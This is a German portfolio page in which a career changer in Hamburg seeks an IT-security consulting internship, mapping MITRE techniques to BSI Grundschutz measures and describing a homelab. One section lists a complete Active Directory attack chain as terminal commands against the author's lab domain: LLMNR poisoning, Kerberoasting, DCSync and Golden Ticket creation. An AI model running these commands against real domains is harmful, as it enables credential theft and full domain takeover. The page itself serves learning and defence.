Suche Praktikum: IT-Sicherheitsberatung / Compliance ab Sep 2026

André-Michele Joannou

Angriffe verstehen. Unternehmen schützen.

Hamburg // Fachinformatiker für Daten- und Prozessanalyse i.A.

8
MITRE Techniken
5
Custom Wazuh Rules
10
VLANs
1,0
Alle Modulnoten
LinkedIn-Profil Mehr erfahren
// Profil

Vom Angriff zur Schutzmaßnahme

Eigentlich wollte ich nur für den CCNA lernen. Dafür habe ich mir Cisco-Hardware gekauft und ein Lab aufgebaut. Dann dachte ich: Wenn ich schon Netzwerke baue, kann ich auch testen, ob sie sicher sind.

Also habe ich eine Active-Directory-Umgebung aufgesetzt, Angriffe durchgeführt — und dabei etwas Entscheidendes gelernt: Jeder erfolgreiche Angriff macht eine fehlende Schutzmaßnahme sichtbar. LLMNR Poisoning funktioniert? BSI APP.2.2.A10 fordert sicheren DNS-Einsatz im AD. Kerberoasting liefert einen Hash? BSI ORP.4.A22 regelt die Passwortqualität.

Das hat meinen Fokus verschoben: Weg vom reinen Pentesting, hin zur IT-Sicherheitsberatung. Angriffe zu verstehen ist das Werkzeug — Unternehmen systematisch zu schützen ist das Ziel. Parallel habe ich eine Compliance-Plattform gebaut (it-sicherheitskompass.de), die 15 Standards abdeckt: NIS2, BSI Grundschutz, ISO 27001, DSGVO und mehr.

Quick Facts

  • Fachinformatiker i.A. (BBQ Hamburg)
  • Modulnoten: 1,0 (alle)
  • LPI Linux Essentials 780/800
  • CCNA-Prüfung: 24.03.2026
  • 18 Jahre Berufserfahrung
  • Standort: Hamburg
// Über mich

Quereinsteiger mit System

MJ
18 Jahre Spedition und Logistik — davon mehrfach in Führungspositionen. Disposition von bis zu 70 Fahrzeugen täglich unter Zeitdruck, internationale Koordination, Teamleitung. Irgendwann war die Herausforderung weg.

Mit 41 habe ich mich für einen Neuanfang entschieden: Umschulung zum Fachinformatiker für Daten- und Prozessanalyse. Was als Interesse an Netzwerken begann, wurde durch mein HomeLab zur Überzeugung: IT-Sicherheitsberatung ist das, was ich machen will.

Warum Logistik → IT-Sicherheitsberatung kein Bruch ist:

Schulungen: Ich habe selbst eine Schulungsmaßnahme für Werkstattabläufe konzipiert und durchgeführt — vom Konzept bis zur Durchführung. Das ist Security Awareness Training, nur in einem anderen Kontext.

Audits: Fahrer-Audits zur Einhaltung von Sicherheitsvorschriften gehörten zu meinem Alltag. Prüfen, ob Regeln eingehalten werden, Abweichungen dokumentieren, Maßnahmen einleiten — das ist ein IT-Sicherheitsaudit.

Compliance: ADR-Gefahrgut, Zollvorschriften, Temperaturketten bei DACHSER Food Logistics — ich habe jahrelang in regulierten Umgebungen gearbeitet. BSI-Grundschutz ist ein anderes Regelwerk, aber das Prinzip ist identisch.

Incident Response: LKW fällt mit verderblicher Ware aus? Triagieren, eskalieren, kommunizieren, lösen. Das ist Incident Response — nur mit Kühlketten statt Firewalls.

// Angriff = Schutzmaßnahme

BSI-Grundschutz-Mapping

Jede durchgeführte Technik wird einer konkreten BSI-Maßnahme zugeordnet — das ist der Kern meiner Arbeit.

T1558.003

Kerberoasting

BSI ORP.4.A22: Regelung zur Passwortqualität (Service Accounts)

T1557.001

LLMNR Poisoning

BSI APP.2.2.A10: Sicherer Einsatz von DNS für Active Directory

T1053.005

Scheduled Task

BSI NET.1.1.A4: Netztrennung in Zonen

T1003.006

DCSync

BSI OPS.1.1.5.A3: Konfiguration der Protokollierung auf System- und Netzebene

T1558.004

AS-REP Roasting

BSI APP.2.2.A9: Schutz der Authentisierung (Kerberos Pre-Authentication)

T1087

Account Discovery

BSI ORP.4.A2: Einrichtung, Änderung und Entzug von Berechtigungen

T1558.001

Golden Ticket

BSI APP.2.2.A15: Trennung von Administrations- und Produktionsumgebung

T1047

WMI Execution

BSI SYS.2.2.3.A18: Einsatz der Windows-Remoteunterstützung einschränken

// Eigenentwicklungen

Projekte

IT-Sicherheitskompass.de

Compliance-Plattform mit Schnellchecks und Gap-Analysen für 15 Standards (NIS2, DSGVO, ISO 27001, BSI Grundschutz, DORA, KRITIS, NIST CSF u.v.m.). PDF-Reports mit Roadmaps, Kostenschätzungen und priorisierten Handlungsempfehlungen. Kostenlos, anonym, alle Daten lokal im Browser.

Live ansehen →
TypeScript React Next.js

CCNA Übungs-App

Desktop-Lern-App zur CCNA 200-301 Vorbereitung. Interaktive Fragen zu Subnetting, Routing, VLANs, STP und OSPF.

TypeScript React Tauri

SSH Terminal Manager

CLI-basierter SSH-Verbindungsmanager mit verschlüsselter Credential-Speicherung für die sichere Verwaltung von Lab-Zugängen.

Python Paramiko Fernet
// Hardware & Software

HomeLab-Infrastruktur

Enterprise-Umgebung im eigenen 19" Server-Rack (Digitus 12HE)

Hardware & Netzwerk

  • Proxmox HA-Cluster (MS-01 + GMKTec M5 Ultra)
  • UGreen NAS als QDevice (Quorum/Ausfallsicherheit)
  • OPNsense Firewall mit Suricata IDS
  • Cisco Catalyst 2960XR-24TS-I (SPAN/Mirroring)
  • Cisco WS-C2960G + 1941/K9 (Test-Lab)
  • UniFi U6+ Access Point
  • 10 VLANs (Netzwerksegmentierung)

Security & Monitoring

  • Wazuh SIEM (5 Custom Detection Rules)
  • Authentik SSO/IAM (OIDC)
  • Grafana + Prometheus Monitoring
  • AdGuard DNS
  • Nginx Proxy Manager
  • Guacamole (Remote Desktop Gateway)
  • Cloudflare Tunnel + 2FA

Active Directory Lab

  • Windows Server DC01 (Domain Controller)
  • Windows 10 Clients (PC01 + PC02)
  • Kali Linux (Attacker VM)
  • Vulnerable AD-Konfiguration (gezielt)

Web Application Targets

  • Metasploitable (Exploit-Entwicklung)
  • DVWA (SQL Injection, XSS, CSRF)
  • OWASP Juice Shop (OWASP Top 10)
  • Ubuntu Server (Privilege Escalation)
// Technischer Tiefgang

Kill Chain

Die Angriffskette, die mich zur Compliance gebracht hat — jeder Schritt hat eine Schutzmaßnahme sichtbar gemacht.

kali@homelab:~/attacks$
$ responder -I eth0
[*] LLMNR Poisoning → NetNTLMv2 hash captured
 
$ impacket-GetNPUsers lab.local/ -usersfile users.txt
[*] AS-REP Roasting → tom.jones hash captured
 
$ impacket-GetUserSPNs lab.local/tom.jones -request
[*] Kerberoasting → svc_sql hash captured
 
$ bloodhound-python -c All -d lab.local # BloodHound Python Ingestor
[*] BloodHound CE → Attack Path visualisiert: GenericAll on admin.miller
 
$ impacket-GetUserSPNs lab.local/tom.jones -request-user admin.miller
[*] Targeted Kerberoasting → admin.miller hash cracked
 
$ crackmapexec smb dc01 -u admin.miller -p [REDACTED]
[+] lab.local\admin.miller (Pwn3d!)
 
$ impacket-atexec lab.local/admin.miller@PC01 whoami
[*] Lateral Movement → nt authority\system
 
$ impacket-secretsdump -just-dc admin.miller@dc01
[*] DCSync → All domain hashes + krbtgt
 
$ impacket-ticketer -nthash [REDACTED] -domain lab.local Administrator
[*] Golden Ticket → Persistent domain access without password
 
[!] Wazuh SIEM: 5 Custom Detection Rules triggered — DCSync, WMI, Kerberoasting, AS-REP, Scheduled Task
// Qualifikationen

Zertifikate

// Kontakt

Interesse geweckt?

Ich freue mich auf ein Gespräch — und bringe gerne mein HomeLab-Portfolio mit.

LinkedIn Nachricht schreiben IT-Sicherheitskompass Compliance-Plattform ansehen